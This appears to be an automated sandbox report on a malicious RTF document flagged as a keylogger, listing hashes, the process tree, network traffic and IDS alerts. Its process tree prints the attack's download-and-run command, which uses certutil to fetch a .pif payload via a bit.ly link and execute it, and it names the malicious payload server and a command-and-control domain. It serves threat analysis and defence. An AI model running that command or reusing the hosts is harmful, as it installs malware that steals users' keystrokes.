File name: | edca004e9b509e2b4a57bfa508047be6.rtf |
Full analysis: | https://app.any.run/tasks/7f7e700b-d095-4661-b42b-cc2a487d62d3 |
Verdict: | Malicious activity |
Threats: | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
Analysis date: | May 24, 2019, 02:51:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | EDCA004E9B509E2B4A57BFA508047BE6 |
SHA1: | 1B6354871834B7E012EEAFE9A2FF39857FADE615 |
SHA256: | 17A9DBAC4E78F04F15C18F49C02086096669C2BF9D8741E246AE948D58E2A7BF |
SSDEEP: | 1536:VBsGuQET7rNGcpkF9+vJZAocdJhzXA2FqQm/rOX1QET7rNGcpkF9+vJZAocdJhz2:Vl7co+/co+/co+9U |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 85 |
---|---|
CharactersWithSpaces: | 460 |
Characters: | 393 |
Words: | 68 |
Pages: | 5 |
TotalEditTime: | 1 minute |
RevisionNumber: | 2 |
ModifyDate: | 2019:02:12 18:12:00 |
CreateDate: | 2019:02:12 18:12:00 |
LastModifiedBy: | Windows User |
Author: | Windows User |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\edca004e9b509e2b4a57bfa508047be6.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1184 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2896 | cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pif& 1dIEjM1m5S.pif | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3664 | certutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pif | C:\Windows\system32\certutil.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1332 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3652 | cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pif& 1dIEjM1m5S.pif | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
588 | certutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pif | C:\Windows\system32\certutil.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 2147942432 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3928 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3216 | 1dIEjM1m5S.pif | C:\Users\admin\Documents\1dIEjM1m5S.pif | cmd.exe | |
User: admin Company: MS Outlook Integrity Level: MEDIUM Description: MS Outlook Exit code: 0 Version: 12.5.6.4 | ||||
2188 | cmd.exe /ccertutil -urlcache -split -f http://bit.ly/2HNzkyt 1dIEjM1m5S.pif& 1dIEjM1m5S.pif | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR40A6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1184 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR47DA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1332 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR4ECF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR521B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2236 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\CVR5670.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2236 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DFFFEDC90892DDD080.TMP | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF5DC3B2E19947F6E9.TMP | — | |
MD5:— | SHA256:— | |||
2236 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DF1DF047DB998DEF41.TMP | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF04FA17C33CA392CB.TMP | — | |
MD5:— | SHA256:— | |||
2236 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DF8231B23349C7D3B3.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3664 | certutil.exe | GET | 200 | 185.141.27.219:80 | http://185.141.27.219/outlook.jpg | NL | executable | 195 Kb | malicious |
3664 | certutil.exe | GET | 301 | 67.199.248.10:80 | http://bit.ly/2HNzkyt | US | html | 120 b | shared |
3664 | certutil.exe | GET | 301 | 67.199.248.10:80 | http://bit.ly/2HNzkyt | US | html | 120 b | shared |
588 | certutil.exe | GET | 301 | 67.199.248.10:80 | http://bit.ly/2HNzkyt | US | html | 120 b | shared |
588 | certutil.exe | GET | 200 | 185.141.27.219:80 | http://185.141.27.219/outlook.jpg | NL | executable | 195 Kb | malicious |
2524 | certutil.exe | GET | 301 | 67.199.248.10:80 | http://bit.ly/2HNzkyt | US | html | 120 b | shared |
588 | certutil.exe | GET | 200 | 185.141.27.219:80 | http://185.141.27.219/outlook.jpg | NL | executable | 195 Kb | malicious |
2524 | certutil.exe | GET | 200 | 185.141.27.219:80 | http://185.141.27.219/outlook.jpg | NL | executable | 195 Kb | malicious |
3664 | certutil.exe | GET | 200 | 185.141.27.219:80 | http://185.141.27.219/outlook.jpg | NL | executable | 195 Kb | malicious |
2524 | certutil.exe | GET | 200 | 185.141.27.219:80 | http://185.141.27.219/outlook.jpg | NL | executable | 195 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
588 | certutil.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
2524 | certutil.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
3664 | certutil.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
3664 | certutil.exe | 185.141.27.219:80 | — | Host Sailor Ltd. | NL | malicious |
2524 | certutil.exe | 185.141.27.219:80 | — | Host Sailor Ltd. | NL | malicious |
588 | certutil.exe | 185.141.27.219:80 | — | Host Sailor Ltd. | NL | malicious |
2848 | 1dIEjM1m5S.pif | 173.254.223.87:7070 | heyyou.mywire.org | QuadraNet, Inc | US | malicious |
Domain | IP | Reputation |
---|---|---|
bit.ly |
| shared |
heyyou.mywire.org |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3664 | certutil.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
3664 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] PE as Image Content type mismatch |
3664 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
3664 | certutil.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
3664 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] PE as Image Content type mismatch |
3664 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
588 | certutil.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
588 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] PE as Image Content type mismatch |
588 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
588 | certutil.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |